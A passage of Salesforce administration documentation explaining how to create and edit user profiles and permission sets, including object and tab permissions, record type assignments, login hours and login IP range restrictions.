1. From Setup, click Manage Users > Profiles.
2. In the Profiles list page, do one of the following:

• Click New Profile, then select an existing profile that’s similar to the one you want to create.
• If enhanced profile list views are enabled, click Clone next to a profile that’s similar to the one you want to create.
• Click the name of a profile that’s similar to the one you want to create, then in the profile page, click Clone.

A new profile uses the same user license as the profile it was cloned from.

3. Enter a profile name.
4. Click Save.

See Also:
User Profiles Overview
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Viewing a Profile's Assigned Users

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view users that are assigned to a profile:

“Manage Users”To create and edit users:

To view all users that are assigned to a profile from the profile overview page, click Assigned Users (in the enhanced profile
user interface) or View Users (in the original profile user interface). From the assigned users page, you can:

• Create one or multiple users

• Reset passwords for selected users

• Edit a user

• View a user's detail page by clicking the name, alias, or username

• View or edit a profile by clicking the profile name

• If Google Apps™ is enabled in your organization, export users to Google and create Google Apps accounts by clicking
Export to Google Apps

See Also:
User Profiles Overview

Viewing and Editing Object Permissions in Permission Sets and Profiles
Object permissions specify the type of access that users have to objects.

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view object permissions:

“Manage Users”

AND

“Customize Application”

To edit object permissions:

1. From Setup, click Manage Users, then click Permission Sets or Profiles.
2. Select a permission set or profile.
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3. Depending on which interface you're using, do one of the following:

• Permission sets or enhanced profile user interface—In the Find Settings... box, enter the name of the object and select
it from the list. Click Edit, then scroll to the Object Permissions section.

• Original profile user interface—Click Edit, then scroll to the Standard Object Permissions or Custom Object Permissions
section.

4. Specify the object permissions. For more information, see Object Permissions on page 375.
5. Click Save.

See Also:
User Profiles Overview

Viewing and Editing Tab Settings in Permission Sets and Profiles
Tab settings specify whether a tab appears in the All Tabs page or is visible in a tab set.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view tab settings:

“Manage Users”To edit tab settings:

1. From Setup, click Manage Users, then click Permission Sets or Profiles.
2. Select a permission set or profile.
3. Do one of the following:

• Permission sets or enhanced profile user interface—In the Find Settings... box, enter the name of the tab you want
and select it from the list, then click Edit.

• Original profile user interface—Click Edit, then scroll to the Tab Settings section.

4. Specify the tab settings.
5. (Original profile user interface only) To reset users’ tab customizations to the tab visibility settings that you specify, select

Overwrite users' personal tab customizations.
6. Click Save.

Note:  If Salesforce CRM Content is enabled for your organization but the Salesforce CRM Content User checkbox
isn’t enabled on the user detail page, the Salesforce CRM Content app has no tabs.

See Also:
User Profiles Overview
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Tab Settings

Available in: Enterprise, Unlimited, and Developer Editions

Tab settings specify whether a tab appears in the All Tabs page or is visible in its associated app. Tab settings labels in permission
sets differ from the labels in profiles.

DescriptionEnabled Setting in ProfilesEnabled Settings in Permission Sets

The tab is available on the All Tabs page.
Individual users can customize their
display to make the tab visible in any app.

Default OffAvailable

The tab is available on the All Tabs page
and appears in the visible tabs for its

Default OnAvailable and Visible

associated app. Individual users can
customize their display to hide the tab or
make it visible in other apps.

The tab isn’t available on the All Tabs
page or visible in any apps.

Tab HiddenNone

Note:  If a user has another permission set or profile with enabled settings for the same tab, the most permissive
setting applies. For example, if permission set A has no settings enabled for the Accounts tab, but permission set B
enables the Available setting for the Accounts tab, and permission sets A and B are assigned to a user, the user
sees the Accounts tab on the All Tabs page.

See Also:
Viewing and Editing Tab Settings in Permission Sets and Profiles

Enhanced Profile User Interface Overview

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The enhanced profile user interface provides a streamlined experience for managing profiles. With it, you can easily navigate,
search, and modify settings for a profile.

You can enable the enhanced profile user interface in the User Interface settings page. Your organization can only use one
profile user interface at a time.

Note:  You can't use the enhanced profile user interface if:

• You use Microsoft® Internet Explorer® 6 or earlier to manage your profiles (unless you've installed the Google
Chrome Frame™ plug-in for Internet Explorer).

• Your organization uses category groups on guest profiles used for sites.
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• Your organization delegates partner portal administration to portal users.

See Also:
Working in the Enhanced Profile User Interface Overview Page
User Profiles Overview

Working in the Enhanced Profile User Interface Overview Page

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Assigned apps, standard objects, tabs, and Visualforce are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view profiles:

“Manage Users”To delete profiles and edit profile properties:

In the enhanced profile user interface, the profile overview page provides an entry point for all of the settings and permissions
for a single profile. To open the profile overview page, from Setup, click Manage Users > Profiles and click the profile you
want to view.

From the profile overview page, you can:

• Search for an object, permission, or setting

• Clone the profile

• If it's a custom profile that's not assigned to any users, delete the profile by clicking Delete
• Change the profile name or description by clicking Edit Properties
• View a list of users who are assigned to the profile

• Click any of the links on the page to view or edit permissions and settings.

◊ Assigned Apps

◊ Object Settings (tab settings, record types and page layout settings, object permissions, and field permissions)

◊ App Permissions

◊ Apex Class Access

◊ Visualforce Page Access

◊ Data Category Visibility (if you've enabled data categories)

◊ System Permissions

◊ Desktop Client Access

◊ Login Hours

◊ Login IP Ranges
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◊ Service Providers (if Salesforce is enabled as an identity provider)

See Also:
Enhanced Profile User Interface Overview

App and System Settings in the Enhanced Profile User Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Database.com Edition doesn't include assigned apps, tabs, record types, page layouts, Visualforce, and desktop clients

In the enhanced profile user interface, administrators can easily navigate, search, and modify settings for a single profile.
Permissions and settings are organized into pages under app and system categories, which reflect the rights users need to
administer and use app and system resources.

App Settings

Apps are sets of tabs that users can change by selecting the drop-down menu in the header. All underlying objects, components,
data, and configurations remain the same, regardless of the selected app. In selecting an app, users navigate in a set of tabs
that allows them to efficiently use the underlying functionality for app-specific tasks. For example, let's say you do most of
your work in the sales app, which includes tabs like Accounts and Opportunities. To track a new marketing campaign, rather
than adding the Campaigns tab to the sales app, you select Marketing from the app drop-down to view your campaigns and
campaign members.

In the enhanced profile user interface, the Apps section of the overview page contains settings that are directly associated with
the business processes that the apps enable. For example, customer service agents may need to manage cases, so the “Manage
Cases” permission is in the Call Center section of the App Permissions page. Some app settings aren't related to app permissions.
For example, to enable the Time-Off Manager app from the AppExchange, users need access to the appropriate Apex classes
and Visualforce pages, as well as the object and field permissions that allow them to create new time-off requests. The Apps
section contains links to these pages:

• Assigned Apps
• Object Settings, which include:

◊ Tab settings
◊ Record types and page layout settings
◊ Object permissions
◊ Field permissions

• App Permissions
• Apex Class Access
• Visualforce Page Access

Note:  Regardless of the currently selected app, all of a user's permissions are respected. For example, although the
“Import Leads” permission is under the Sales category, a user can import leads even while in the Call Center app.
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System Settings

Some system functions apply to an organization and not to any single app. For example, login hours and login IP ranges
control a user's ability to log in, regardless of which app the user accesses. Other system functions apply to all apps. For example,
the “Run Reports” and “Manage Dashboards” permissions allow managers to create and manage reports in all apps. In some
cases, such as with “Modify All Data,” a permission applies to all apps, but also includes non-app functions, like the ability to
download the Data Loader.

In the enhanced profile user interface, the System section of the overview page contains links to these pages:

• System Permissions
• Desktop Client Access
• Login Hours
• Login IP Ranges
• Service Providers (if Salesforce is enabled as an identity provider)

See Also:
Enhanced Profile User Interface Overview

Searching in the Enhanced Profile User Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The following items don't appear in searches when using the enhanced profile user interface with Database.com: standard
objects, assigned apps, tabs, Visualforce page access settings, and desktop client access settings.

User Permissions Needed

“View Setup and Configuration”To find permissions and settings in a profile:

On any of the profile pages, type at least three consecutive letters of an object, tab, permission, or setting name in the Find
Settings... box. The search terms aren't case-sensitive. As you type, suggestions for results that match your search terms appear
in a list. Click an item in the list to go to its settings page.

You can search for:

ExampleItem

Type sales in the Find Settings box, then select Sales from the list.Assigned apps

Type an existing object’s name. For example, let’s say you have an Albums
custom object, type albu, then select Albums.

Objects

Type the name of the object that contains the field. For example, let’s say
your Albums object contains a Description field. To find the Description

Fields

field for albums, type albu, select Albums, and scroll down to
Description under Field Permissions.

Type rep, then select Reports.Tabs
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ExampleItem

Type apex, then select Apex Class Access.Apex class access settings

Type VISU, then select Visualforce Page Access.Visualforce page access settings

Type api, then select API Enabled.App and system permissions

Type des, then select Desktop Client Access.Desktop client access settings

Type log, then select Login Hours or Login IP Ranges.

Or type ip r, then select Login IP Ranges.

Login hours and login IP ranges

Type serv, then select Service Providers.Service providers (available only if Salesforce is
enabled as an identity provider)

If no results appear in a search:

• The permission, object, tab, or setting you're searching for may not be available in the current organization.

• The item you're searching for may not be available for the user license that's associated with the current profile. For example,
a profile with the High Volume Customer Portal license doesn't include the “Modify All Data” permission.

• Be sure your search terms have at least three consecutive characters that match the name of the item you want to find.

• Be sure the search term is spelled correctly.

See Also:
Enhanced Profile User Interface Overview

Assigning Record Types and Page Layouts in the Enhanced Profile User Interface

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To edit object permissions and settings:

In the enhanced profile user interface, Record Types and Page Layout Assignments settings determine the record type and
page layout assignment mappings that are used when users view records. They also determine which record types are available
when users create or edit records.

To specify record types and page layout assignments:

1. From Setup, click Manage Users > Profiles.
2. Select a profile.
3. In the Find Settings... box, enter the name of the object you want and select it from the list.
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4. Click Edit.
5. In the Record Types and Page Layout Assignments section, make changes to the settings as needed.

DescriptionSetting

Lists all existing record types for the object.

--Master-- is a system-generated record type that's used when a record has
no custom record type associated with it. When --Master-- is assigned, users

Record Types

can't set a record type to a record, such as during record creation. All other record
types are custom record types.

The page layout to use for each record type. The page layout determines the
buttons, fields, related lists, and other elements that users with this profile see

Page Layout Assignment

when creating records with the associated record type. Since all users can access
all record types, every record type must have a page layout assignment, even if
the record type isn't specified as an assigned record type in the profile.

Record types that are checked in this column are available when users with this
profile create records for the object. If --Master-- is selected, you can't select

Assigned Record Types

any custom record types; and if any custom record types are selected, you can't
select --Master--.

The default record type to use when users with this profile create records for the
object.

Default Record Type

The Record Types and Page Layout Assignments settings have some variations for the following objects or tabs.

VariationObject or Tab

If your organization uses person accounts, the accounts object additionally includes
Business Account Default Record Type and Person Account Default Record

Accounts

Type settings, which specify the default record type to use when the profile's
users create business or person account records from converted leads.

The cases object additionally includes Case Close settings, which show the page
layout assignments to use for each record type on closed cases. That is, the same

Cases

record type may have different page layouts for open and closed cases. With this
additional setting, when users close a case, the case may have a different page
layout that exposes how it was closed.

You can't specify custom record types for the home tab. You can only select a
page layout assignment for the --Master-- record type.

Home
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6. Click Save.

See Also:
Overview of Record Type Access
Assigning Custom Record Types in Permission Sets
Working in the Enhanced Profile User Interface Overview Page

Viewing and Editing Login Hours in the Enhanced Profile User Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view login hour settings:

“Manage Users”To edit login hour settings:

For each profile, you can specify the hours when users can log in.

1. From Setup, click Manage Users > Profiles.
2. Select a profile and click its name.
3. In the profile overview page, scroll down to Login Hours and click Edit.
4. Set the days and hours when users with this profile can log in to the organization.

To allow users to log in at any time, click Clear all times. To prohibit users from using the system on a specific day, set
the start and end times to the same value.

If users are logged in when their login hours end, they can continue to view their current page, but they can’t take any
further action.

Note: The first time login hours are set for a profile, the hours are based on the organization’s Default Time
Zone as specified in Setup at Company Profile > Company Information. After that, any changes to the organization’s
Default Time Zone won’t change the time zone for the profile’s login hours. As a result, the login hours are always
applied at those exact times even if a user is in a different time zone or if the organization’s default time zone is
changed.

Depending on whether you’re viewing or editing login hours, the hours may appear differently. On the Login Hours
edit page, hours are shown in your specified time zone. On the profile overview page, they appear in the organization’s
original default time zone.

See Also:
Enhanced Profile User Interface Overview
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Restricting Login IP Ranges in the Enhanced Profile User Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view login IP ranges:

“Manage Users”To edit login IP ranges:

“Modify All Data”To delete login IP ranges:

You can control login access on a user’s profile by specifying a range of IP addresses. When you define IP address restrictions
for a profile, any login from a restricted IP address is denied.

1. From Setup, click Manage Users > Profiles.
2. Select a profile and click its name.
3. In the profile overview page, click Login IP Ranges.
4. Use any of these methods to change login IP address ranges for the profile.

• If you want to add ranges, click Add IP Ranges. Enter a valid IP address in the IP Start Address and a higher
IP address in the IP End Address field. The start and end addresses define the range of allowable IP addresses from
which users can log in. To allow logins from a single IP address, enter the same address in both fields. For example,
to allow logins from only 125.12.3.0, enter 125.12.3.0 as both the start and end addresses.

• If you want to edit or remove ranges, click Edit or Delete for that range.

Both IP addresses in a range must be either IPv4 or IPv6. In ranges, IPv4 addresses exist in the IPv4-mapped IPv6 address
space ::ffff:0:0 to ::ffff:ffff:ffff, where ::ffff:0:0 is 0.0.0.0 and ::ffff:ffff:ffff is
255.255.255.255. A range can’t include IP addresses inside of the IPv4-mapped IPv6 address space if it also includes
IP addresses outside of the IPv4-mapped IPv6 address space. Ranges such as 255.255.255.255 to ::1:0:0:0 or ::
to ::1:0:0:0 are not allowed. You can set up IPv6 addresses in all organizations, but IPv6 is only enabled for login in
sandbox organizations from the Spring ’12 release and later.

Important:

• Partner User profiles are limited to 5 IP addresses. If you want to increase this limit, contact salesforce.com.
• The Salesforce Classic app can bypass IP range definitions set up for profiles. Salesforce Classic initiates a

secure connection to Salesforce over the mobile carrier’s network, but the mobile carrier’s IP addresses might
be outside of the IP ranges allowed on the user’s profile. To prevent bypassing IP definitions set on a user’s
profile, disable Salesforce Classic on page 682 for that user.
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Working with Profiles in the Original Profile Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The settings that are available on the profile detail page vary according to your Edition.

To view a profile, from Setup, click Manage Users > Profiles, then select the profile you want.

On the profile detail page, you can:

• Edit the profile

• Create a profile based on this profile

• For custom profiles only, click Delete to delete the profile

• View the users who are assigned to this profile

Editing Profiles in the Original Profile Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To edit profiles:

You can edit all settings in a custom profile. In standard profiles, you can edit all settings except name, description, object
permissions, field permissions, and user permissions.

1. From Setup, click Manage Users > Profiles.
2. Select the profile you want to edit.
3. On the profile detail page, click Edit to change any of the following settings:

• For custom profiles only, the name and description
• App visibility settings
• Connected Apps accessible to this profile
• Tab visibility settings
• For custom profiles only, administrative and general permissions
• For custom profiles only, object permissions

Note:  Editing some permissions may automatically cause other permissions to be enabled or disabled. For
example, enabling “View All Data” automatically enables “Read” for all objects. Likewise, enabling “Transfer
Leads” automatically enables “Read” and “Create” on leads.
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Tip:  If enhanced profile list views are enabled for your organization, you can change permissions for multiple
profiles from the list view.

• Desktop client access settings

You can also view or edit the following settings from the profile detail page:

Procedure to View or EditSetting

Under the Console Settings section, click Edit.Console layouts for all profiles

Under the Page Layouts section, click View Assignment next
to an object name.

Page layouts

Under the Field-Level Security section, click View next to an
object name.

Access to fields in each object

Under the Record Type Settings section, click Edit next to a
tab name. The Edit link is available only if record types exist
for the object.

Record types

Under the Login Hours section, click Edit.Login hours

Under the Login IP Ranges section, click New, or click Edit
next to an existing IP range.

Login IP address ranges

Under the Enabled Apex Class Access section, click Edit.Executable Apex classes

Under the Enabled Visualforce Page Access section, click
Edit.

Executable Visualforce pages

See Also:
Assigning Page Layouts in the Original Profile User Interface
Viewing and Editing Desktop Client Access in the Original Profile User Interface
Assigning Record Types to Profiles in the Original Profile User Interface
Viewing and Editing Login Hours in the Original Profile User Interface
Restricting Login IP Addresses in the Original Profile User Interface
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Assigning Page Layouts in the Original Profile User Interface

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To assign page layouts:

1. From Setup, click Manage Users > Profiles.
2. Select a profile.
3. Click View Assignment next to any tab name in the Page Layouts section.
4. Click Edit Assignment.
5. Use the table to specify the page layout for each profile. The table displays the page layout assignments for each profile. If

your organization uses record types, a matrix displays a page layout selector for each profile and record type. Selected page
layout assignments are highlighted. Page layout assignments you change are italicized until you save your changes.

6. If necessary, select another page layout from the Page Layout To Use drop-down list and repeat the previous step for
the new page layout.

7. Click Save.

See Also:
Working with Profiles in the Original Profile Interface

Viewing and Editing Desktop Client Access in the Original Profile User Interface

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view desktop client access settings:

“Manage Users”To edit desktop client access settings:

Connect for Outlook, Connect Offline, Connect for Office, and Connect for Lotus Notes are desktop clients that integrate
Salesforce with your PC. As an administrator, you can control which desktop clients your users can access as well as whether
users are automatically notified when updates are available.

Note: To access desktop clients, users must also have the “API Enabled” permission.

1. From Setup, click Manage Users > Profiles.
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2. Click Edit next to a profile name, and scroll to the Desktop Integration Clients section at the bottom of the page.

See Also:
Working with Profiles in the Original Profile Interface

Assigning Record Types to Profiles in the Original Profile User Interface

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To assign record types to profiles:

After creating record types and including picklist values in them, add record types to user profiles and assign a default record
type for each profile. When you add a record type to a profile, users with that profile can assign that record type to records
they create or edit.

Note:  Any user can view records having any record type, even if the record type is not associated with their profile.

A profile can be associated with several record types. For example, a user who creates opportunities for both hardware and
software sales can have both “Hardware” and “Software” record types available when creating opportunities if both record
types have been added to the user’s profile.

1. From Setup, click Manage Users > Profiles.
2. Select a profile. The record types available for that profile are listed in the Record Type Settings section.
3. Click Edit next to the appropriate type of record.
4. Select a record type from the Available Record Types list and add it to the Selected Record Types list to make it available

to users with that profile.

Master is a system-generated record type that's used when a record has no custom record type associated with it. When
Master is assigned, users can't set a record type to a record, such as during record creation. All other record types are
custom record types.

5. From the Default drop-down list, choose a default record type.

If your organization uses person accounts, this setting also controls which account fields display in the Quick Create
area of the accounts home page.

6. If your organization uses person accounts, set additional options for the default record types for both person accounts and
business accounts. These settings are used when defaults are needed for both kinds of accounts, such as when converting
leads.

• From the Business Account Default Record Type drop-down list, choose a default record type for business
accounts.

• From the Person Account Default Record Type, choose a default record type for person accounts.

7. Click Save.
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Options in the Record Type Settings section are blank wherever no record types exist. For example, if you have two record
types for opportunities but no record types for accounts, the Edit link only displays for opportunities. In this example, the
picklist values and default value for the master are available in all accounts.

Note:  If your organization uses person accounts, you can view the record type defaults for business accounts and
person accounts in the Account Record Type Settings section of the profile detail page. Also, clicking Edit in that
section is an alternative way of opening the page where you set record type defaults for accounts.

See Also:
Overview of Record Type Access
Working with Profiles in the Original Profile Interface
Assigning Custom Record Types in Permission Sets

Viewing and Editing Login Hours in the Original Profile User Interface

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To set login hours:

For each profile, you can specify the hours when users can log in.

1. From Setup, click Manage Users > Profiles, and select a profile.
2. Click Edit in the Login Hours related list.
3. Set the days and hours when users with this profile can use the system.

To allow users to log in at any time, click Clear All Times. To prohibit users from using the system on a specific day, set
the start and end times to the same value.

If users are logged in when their login hours end, they can continue to view their current page, but they can’t take any
further action.

4. Click Save.

Note: The first time login hours are set for a profile, the hours are based on the organization’s Default Time
Zone as specified in Setup at Company Profile > Company Information. After that, any changes to the organization’s
Default Time Zone won’t change the time zone for the profile’s login hours. As a result, the login hours are always
applied at those exact times even if a user is in a different time zone or if the organization’s default time zone is
changed.
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Depending on whether you're viewing or editing login hours, the hours may appear differently. On the profile detail
page, hours are shown in your specified time zone. On the Login Hours edit page, they appear in the organization's
default time zone.

See Also:
Working with Profiles in the Original Profile Interface
Restricting Login IP Addresses in the Original Profile User Interface

Restricting Login IP Addresses in the Original Profile User Interface

Available in: All Editions

User Permissions Needed

“View Setup and Configuration”To view login IP ranges:

“Manage Users”To edit login IP ranges:

“Modify All Data”To delete login IP ranges:

You can control login access on a user’s profile by specifying a range of IP addresses. When you define IP address restrictions
for a profile, any login from a restricted IP address is denied.

1. The procedure you use to restrict the range of valid IP addresses on profiles depends on your Edition:

• If you’re using Enterprise, Unlimited, or Developer editions, from Setup, click Manage Users > Profiles, and select a
profile.

• If you’re using Professional, Group, or Personal editions, from Setup, click Security Controls > Session Settings.

2. Click New in the Login IP Ranges related list.
3. Enter a valid IP address in the IP Start Address and a higher IP address in the IP End Address field.

The start and end addresses define the range of allowable IP addresses from which users can log in. To allow logins from
a single IP address, enter the same address in both fields. For example, to allow logins from only 125.12.3.0, enter 125.12.3.0
as both the start and end addresses.

• Partner User profiles are limited to 5 IP addresses. If you want to increase this limit, contact salesforce.com.
• The Salesforce Classic app can bypass IP range definitions set up for profiles. Salesforce Classic initiates a secure

connection to Salesforce over the mobile carrier’s network, but the mobile carrier’s IP addresses might be outside of
the IP ranges allowed on the user’s profile. To prevent bypassing IP definitions set on a user’s profile, disable Salesforce
Classic on page 682 for that user.

4. Click Save.

Both IP addresses in a range must be either IPv4 or IPv6. In ranges, IPv4 addresses exist in the IPv4-mapped IPv6 address
space ::ffff:0:0 to ::ffff:ffff:ffff, where ::ffff:0:0 is 0.0.0.0 and ::ffff:ffff:ffff is
255.255.255.255. A range can’t include IP addresses inside of the IPv4-mapped IPv6 address space if it also includes IP
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addresses outside of the IPv4-mapped IPv6 address space. Ranges such as 255.255.255.255 to ::1:0:0:0 or :: to
::1:0:0:0 are not allowed. You can set up IPv6 addresses in all organizations, but IPv6 is only enabled for login in sandbox
organizations from the Spring ’12 release and later.

Note: Cache settings on static resources are set to private when accessed via a Force.com site whose guest user's
profile has restrictions based on IP range or login hours. Sites with guest user profile restrictions cache static resources
only within the browser. Also, if a previously unrestricted site becomes restricted, it can take up to 45 days for the
static resources to expire from the Salesforce cache and any intermediate caches.

See Also:
Restricting Login IP Ranges for Your Organization
Viewing and Editing Login Hours in the Original Profile User Interface
Working with Profiles in the Original Profile Interface

Viewing and Editing Assigned Apps in Profiles
Assigned app settings specify the apps that users can select in the Force.com app menu.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit app visibility settings:

Every profile must have at least one visible app, except profiles associated with Customer Portal users because apps are not
available to them.

To specify app visibility:

1. From Setup, click Manage Users > Profiles.
2. Select a profile.
3. Depending on which user interface you're using, do one of the following:

• Enhanced profile user interface—Click Assigned Apps, then click Edit.
• Original profile user interface—Click Edit, then scroll to the Custom App Settings section.

4. Select one default app. The default app appears when users log in for the first time.
5. Select Visible for any other apps you want to make visible.

See Also:
User Profiles Overview
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Permission Sets Overview
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Visualforce is not available in Database.com

A permission set is a collection of settings and permissions that give users access to various tools and functions. The settings
and permissions in permission sets are also found in profiles, but permission sets extend users' functional access without
changing their profiles. For example, to give users access to a custom object, create a permission set, enable the required
permissions for the object, and assign the permission set to the users. You never have to change profiles, or create a profile for
a single use case. While users can have only one profile, they can have multiple permission sets.

Permission sets include settings for:

• Assigned apps

• Object settings, which include:

◊ Tab settings

◊ Record type settings

◊ Object permissions

◊ Field permissions

• App permissions

• Apex class access

• Visualforce page access

• System permissions

• Service providers (only if you've enabled Salesforce as an identity provider)

Note:

• Some user licenses restrict the number of custom apps or tabs a user can access. Salesforce calculates the total
allowed number of custom tabs and assigned apps from settings in a user’s assigned profile plus any assigned
permission sets. For users with a license that restricts the number of apps or tabs, you can't assign more than the
allotted limit through their assigned profile and permission sets. For example, a user with the Force.com App
Subscription user license with access to one Force.com Light App can access only that app’s custom tabs.

• In Group and Professional Editions, permission sets may be included in installed packages, where they can be
viewed and assigned to users but not edited.

See Also:
Creating Permission Sets
Using Permission Set Lists
Working in a Permission Set's Overview Page
Assigning Permission Sets
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Creating Permission Sets

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create permission sets:

You can either clone an existing permission set or create a new one. A cloned permission set starts with the same user license
and enabled permissions as the permission set it is cloned from, while a new permission set starts with no user license selected
and no permissions enabled. You can create up to 1,000 permission sets.

1. From Setup, click Manage Users > Permission Sets.
2. Do one of the following:

• To create a permission set with no permissions enabled, click New.
• To create a permission set based on an existing set, click Clone next to the set you want to copy. You can also select

the permission set and click Clone in the overview page or one of the settings pages.

Note:  Clone a permission set only if the new one should have the same user license as the original. In a cloned
permission set, you can't select a different license.

3. Enter a label, API name, and description.

The API name is a unique name used by the Force.com API and managed packages. It must begin with a letter and use
only alphanumeric characters and underscores. It can't include spaces, end with an underscore, or have two consecutive
underscores.

4. If this is a new permission set, select a user license option. If you plan to assign this permission set to multiple users with
different licenses, select --None--. If only users with one type of license will use this permission set, select the user license
that’s associated with them. For more information, see About User Licenses in Permission Sets on page 351.

If you’re cloning a permission set, you can’t select a user license. If the User License field is blank, no user license is associated
with the permission set.

5. Click Save.

The permission set overview page appears. From here you can navigate to the permissions you want to add or change.

See Also:
Assigning Permission Sets
Working in a Permission Set's Overview Page
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About User Licenses in Permission Sets

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

When creating a permission set, you can select a specific user license or --None--.

If you’re selecting a specific license, select the license that matches the users who will use the permission set.  For example, if
you plan to assign this permission set to users with the Salesforce license, select Salesforce.

If you plan to assign this permission set to multiple users with different licenses, select --None--, for no user license. With
this option, you can assign the permission set to any users whose license allows the enabled permissions. For example, if you
plan to assign the permission set to users with the Salesforce license as well as users with the Salesforce Platform license, select
--None--.

Note:

• Permission sets with no user license don’t include all possible permissions and settings.

• You can only assign a permission set with no license to users whose licenses allow the enabled permissions and
settings. For example, if you create a permission set with no user license and enable “Author Apex,” you can’t
assign that permission set to users with the Salesforce Platform user license because the license doesn’t allow that
permission.

See Also:
Creating Permission Sets
Assigning Permission Sets

Using Permission Set Lists

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view permission sets, and print permission set lists:

“Manage Users”To delete permission sets and permission set list views:

To view the permission sets in your organization, from Setup, click Manage Users > Permission Sets. In the permission sets
list page, you can:

• Show a filtered list of permission sets by selecting a view from the drop-down list

• Create a list view or edit an existing view

• Delete a list view by selecting it from the drop-down list and clicking Delete
• Create or clone a permission set

351

Permission Sets OverviewManage User Access to Data



• Print a list view by clicking .
•

Refresh the list view by clicking 
• Edit permissions directly in a list view

• View or edit a permission set

• If it's not assigned to any users, remove a permission set by clicking Del

See Also:
Permission Sets Overview

Creating and Editing Permission Set List Views

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create, edit, and delete permission set list views:

You can create and edit permission set list views to show a list of permission sets with specific fields and permissions. For
example, you could create a list view of all permission sets in which “Modify All Data” is enabled.

1. In the Permission Sets page, click Create New View, or select a view and click Edit.
2. Enter the view name.
3. Under Specify Filter Criteria, specify the conditions that the list items must match, such as Modify All Data equals

True.

a. Type a setting name, or click  to search for and select the setting you want.
b. Choose a filter operator.
c. Enter the value that you want to match.

Tip:  To show only permission sets with no user license, enter User License for the Setting, set the
Operator to equals, and enter "" in the Value field.

d. To specify another filter condition, click Add Row. You can specify up to 25 filter condition rows.

To remove a filter condition row and clear its values, click .

4. Under Select Columns to Display, specify the settings that you want to appear as columns in the list view. You can add
up to 15 columns.

a. From the Search drop-down list, select a setting type.
b. Enter part or all of a word in the setting you want to add and click Find.

Note:  If the search finds more than 500 values, no results appear. Refine your search criteria to show fewer
results.
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c. To add or remove columns, select one or more column names and click the Add or Remove arrow.
d. Use the Top, Up, Down, and Bottom arrows to arrange the columns in the sequence you want.

5. Click Save, or if you're cloning an existing view, rename it and click Save As.

See Also:
Using Permission Set Lists
Editing Permission Sets from a List View

Editing Permission Sets from a List View

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To edit multiple permission sets from the list view:

You can change permissions in up to 200 permission sets directly from the list view, without accessing individual permission
sets.

Note:  Use care when editing permission sets with this method. Making mass changes may have a widespread effect
on users in your organization.

1. Select or create a list view that includes the permission sets and permissions you want to edit.
2. To edit multiple permission sets, select the checkbox next to each one you want to edit. If you select permission sets on

multiple pages, the selections on each page are remembered.
3. Double-click the permission you want to edit. For multiple permission sets, double-click the permission in any of the

selected permission sets.
4. In the dialog box that appears, enable or disable the permission. In some cases, changing a permission may also change

other permissions. For example, if “Manage Cases” and “Transfer Cases” are enabled in a permission set and you disable
“Transfer Cases,” then “Manage Cases” is also disabled. In this case, the dialog box lists the affected permissions.

5. To change multiple permission sets, select All n selected records (where n is the number of permission sets you selected).
6. Click Save.

If you edit multiple permission sets, only those that support the permission you are changing will change. For example, if you
use inline editing to enable “Modify All Data” in a permission set, but because of its user license the permission set doesn't
have “Modify All Data,” the permission set won't change.

If any errors occur, the error message lists each permission set and a description of the error. Click the permission set name
to open its overview page. The permission sets you've clicked appear in the error window in gray, strike-through text.
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Any changes you make are recorded in the setup audit trail.

See Also:
Using Permission Set Lists

Working in a Permission Set's Overview Page

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Visualforce is not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view permission sets:

“Manage Users”To delete permission sets and edit permission set properties:

A permission set's overview page provides an entry point for all of the permissions in a permission set. To open a permission
set overview page, from Setup, click Manage Users > Permission Sets and select the permission set you want to view.

From the permission set overview page, you can:

• Search for permissions and settings

• Create a permission set based on the current permission set

• If it's not assigned to any users, remove the permission set by clicking Delete
• Change the permission set label, API name, or description by clicking Edit Properties
• View a list of users who are assigned to the permission set by clicking click Assigned Users
• View or edit:

◊ Assigned apps

◊ Assigned Connected Apps

◊ Object settings (tab and record type settings, object permissions, and field permissions)

◊ App permissions

◊ Apex class access settings

◊ Visualforce page access settings

◊ Visibility of data categories, if you've enabled them

◊ System permissions

◊ Service providers (if you've enabled Salesforce as an identity provider)

See Also:
Assigning Permission Sets
About App and System Settings in Permission Sets
Permission Sets Overview
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About App and System Settings in Permission Sets

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

In permission sets, permissions and settings are organized into app and system categories, which reflect the rights users need
to administer and use system and app resources.

App Settings

Apps are sets of tabs that users can change by selecting the drop-down menu in the header. All underlying objects, components,
data, and configurations remain the same, regardless of the selected app. In selecting an app, users navigate in a set of tabs
that allows them to efficiently use the underlying functionality for app-specific tasks. For example, let's say you do most of
